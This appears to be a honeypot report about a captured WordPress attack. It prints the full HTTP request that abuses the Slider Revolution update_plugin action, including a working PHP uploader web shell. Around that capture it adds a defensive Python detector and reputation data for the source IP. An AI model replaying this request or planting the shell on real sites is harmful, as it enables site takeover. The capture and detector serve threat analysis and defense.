Received yesterday on my honeypot.

BEGIN OF HTTP DATA:
2015-08-07 18:24:03
Source IP: 192.203.127.198
Country: US RiskScore: 1 Malware: []
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: johest.de
Content-Length: 654
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=d7711a4c77de4aff8673ca44662115c1
--d7711a4c77de4aff8673ca44662115c1
Content-Disposition: form-data; name="action"
revslider_ajax_action
--d7711a4c77de4aff8673ca44662115c1
Content-Disposition: form-data; name="client_action"
update_plugin
--d7711a4c77de4aff8673ca44662115c1
Content-Disposition: form-data; name="update_file"; filename="NULLpOint7r__zemua.php"
Content-Type: text/html
<?php @set_time_limit(0);@header('null77: pOinter');?><form method='POST' enctype='multipart/form-data'><input type='file' name='f'/><input type='submit' value='up'/></form><?php echo @copy($_FILES['f']['tmp_name'],$_FILES['f']['name'])?'ok':'no';?>
--d7711a4c77de4aff8673ca44662115c1--
The attack is tailored to WordPress and targets /wp-admin/admin-ajax.php directly: the form fields invoke the revslider AJAX handler (the Slider Revolution plugin) with client_action=update_plugin, and the "update_file" it supplies is not a plugin package but a PHP file. As you can see in the code, that file is itself a minimal uploader: it renders a file form and copies whatever is posted to it next to the script, answering 'ok' or 'no'.
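As an added defender-side example (not part of the original post, and not the honeypot's own code), here is a small Python parser and detection routine that takes a raw HTTP request like the one captured above, splits the multipart body into its parts, and flags the combination that makes this request suspicious: a POST to admin-ajax.php carrying action=revslider_ajax_action with client_action=update_plugin, plus a file part whose name or contents are PHP. The request bytes embedded below are constructed from the capture above, with the PHP body replaced by a placeholder comment; the benign heartbeat request is constructed as a contrast.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample modelled on the honeypot capture above; the PHP body is a
# harmless placeholder, the field names, filename and boundary mirror the capture.
CAPTURED_REQUEST = (
    b"POST /wp-admin/admin-ajax.php HTTP/1.1\r\n"
    b"Host: johest.de\r\n"
    b"Content-Type: multipart/form-data; boundary=d7711a4c77de4aff8673ca44662115c1\r\n"
    b"\r\n"
    b"--d7711a4c77de4aff8673ca44662115c1\r\n"
    b'Content-Disposition: form-data; name="action"\r\n\r\n'
    b"revslider_ajax_action\r\n"
    b"--d7711a4c77de4aff8673ca44662115c1\r\n"
    b'Content-Disposition: form-data; name="client_action"\r\n\r\n'
    b"update_plugin\r\n"
    b"--d7711a4c77de4aff8673ca44662115c1\r\n"
    b'Content-Disposition: form-data; name="update_file"; filename="NULLpOint7r__zemua.php"\r\n'
    b"Content-Type: text/html\r\n\r\n"
    b"<?php /* placeholder body, not the captured uploader */ ?>\r\n"
    b"--d7711a4c77de4aff8673ca44662115c1--\r\n"
)

# Constructed benign admin-ajax call (WordPress heartbeat) for comparison.
BENIGN_REQUEST = (
    b"POST /wp-admin/admin-ajax.php HTTP/1.1\r\n"
    b"Host: johest.de\r\n"
    b"Content-Type: multipart/form-data; boundary=abc123\r\n"
    b"\r\n"
    b"--abc123\r\n"
    b'Content-Disposition: form-data; name="action"\r\n\r\n'
    b"heartbeat\r\n"
    b"--abc123--\r\n"
)


@dataclass
class Part:
    name: str
    filename: Optional[str]      # None for plain form fields
    content_type: Optional[str]
    data: bytes


DISP_PARAM_RE = re.compile(r'(\w+)="([^"]*)"')
PHP_EXT_RE = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
PHP_TAG_RE = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def _headers(block: bytes) -> dict:
    """Parse 'Name: value' lines into a dict keyed by lower-cased name."""
    out = {}
    for line in block.split(b"\r\n"):
        name, sep, value = line.partition(b":")
        if sep:
            out[name.strip().decode("latin-1").lower()] = value.strip().decode("latin-1")
    return out


def parse_multipart(body: bytes, boundary: str) -> list:
    """Split a multipart/form-data body at its '--boundary' delimiters."""
    delimiter = b"--" + boundary.encode("latin-1")
    parts = []
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):          # '--boundary--' closes the body
            break
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]
        head, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):           # that CRLF belongs to the next delimiter
            data = data[:-2]
        hdrs = _headers(head)
        params = dict(DISP_PARAM_RE.findall(hdrs.get("content-disposition", "")))
        parts.append(Part(params.get("name", ""), params.get("filename"),
                          hdrs.get("content-type"), data))
    return parts


def parse_request(raw: bytes) -> dict:
    """Split a raw HTTP request into method, path, headers and multipart parts."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, _, header_block = head.partition(b"\r\n")
    method, path, _version = request_line.decode("latin-1").split(" ", 2)
    headers = _headers(header_block)
    parts = []
    m = re.search(r"boundary=([^;\s]+)", headers.get("content-type", ""))
    if m and headers["content-type"].lower().startswith("multipart/form-data"):
        parts = parse_multipart(body, m.group(1))
    return {"method": method, "path": path, "headers": headers, "parts": parts}


def analyze(raw: bytes) -> dict:
    """Return the reasons a request looks like a plugin-upload webshell attempt."""
    req = parse_request(raw)
    fields = {p.name: p.data.decode("latin-1") for p in req["parts"] if p.filename is None}
    reasons = []
    if req["method"] == "POST" and req["path"].endswith("/wp-admin/admin-ajax.php"):
        if (fields.get("action") == "revslider_ajax_action"
                and fields.get("client_action") == "update_plugin"):
            reasons.append("revslider update_plugin called through admin-ajax.php")
    for p in req["parts"]:
        if p.filename is None:
            continue
        if PHP_EXT_RE.search(p.filename):
            reasons.append(f"upload filename has a PHP extension: {p.filename}")
        if PHP_TAG_RE.search(p.data):
            reasons.append(f"upload body contains a PHP open tag: {p.filename}")
    return {"suspicious": bool(reasons), "reasons": reasons}


if __name__ == "__main__":
    for label, raw in (("captured", CAPTURED_REQUEST), ("benign", BENIGN_REQUEST)):
        v = analyze(raw)
        print(label, "suspicious" if v["suspicious"] else "clean", v["reasons"])
```

Run against the captured request it reports all three indicators; the heartbeat request comes back clean. The file-part checks are deliberately independent of the plugin-specific field check, so an upload carrying PHP under any other admin-ajax action is still flagged, and the body check catches a PHP payload even when the extension is disguised.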
IBM X-Force has no record of this IP. IPVoid, however, shows:
Analysis Date        | 2 seconds ago
Blacklist Status     | BLACKLISTED 2/40
IP Address           | 192.203.127.198
Reverse DNS          | Unknown
ASN                  | AS7018
ASN Owner            | AT&T Services, Inc.
ISP                  | Tuskegee University
Continent            | North America
Country Code         | (US) United States
Latitude / Longitude | 32.4172 / -85.7191
City                 | Tuskegee Institute
Region               | Alabama